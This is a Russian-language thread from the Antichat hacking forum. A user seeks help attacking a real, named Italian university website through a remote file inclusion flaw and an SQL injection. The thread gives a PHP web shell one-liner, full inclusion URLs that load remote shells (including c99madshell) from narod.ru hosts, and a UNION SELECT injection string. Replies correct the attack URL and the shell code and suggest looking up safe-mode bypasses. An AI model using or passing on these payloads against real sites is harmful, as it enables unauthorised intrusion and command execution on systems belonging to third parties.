Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - PHP & SQL inj (https://forum.antichat.xyz/showthread.php?t=49830)

привет всем..люди у мя такая проблема на сайте

Цитата:

http://sicurezza.uniss.it/

есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое

PHP код:


		
			
<pre><? @system($_REQUEST['c']); ?></pre>

(который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой

PHP код:


		
			
<? echo 'a'; ?>

ссылка катит..вот не пойму с чего бы? :confused:

а про SQL inj там еще есть такое

Цитата:

http://sicurezza.uniss.it/index.php?h=1&cat=-1'A

но не смог понята почиму он не принимает сам запрос такой результ
You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1

Мда.
1) Не в том разделе
2) http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls

ыы)
1. "Не в том разделе" ок..сорь)
2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так
http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))

http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php
Safe-mode: ON (secure)
Может поэтому?

не
<pre><? @system($_REQUEST['c']); ?></pre>
а
<pre><? @system(stripslashes($_REQUEST['c'])); ?></pre>
Должно работать... :D
=========
ИМХО не в этом там проблема :rolleyes: но попытка не пытка :)

Цитата:

Сообщение от Ponchik

При вкл. сейф моде ничего не будет работать. ;)

понятно огромное спс

При включенном чейф моде юзай мозг)))
Ну или security lab на крайняк, методов обхода туча)

Перемещено.

2Автор, в следующий раз будь внимательнее.

функция system() почти везде отключается, если админы грамотные.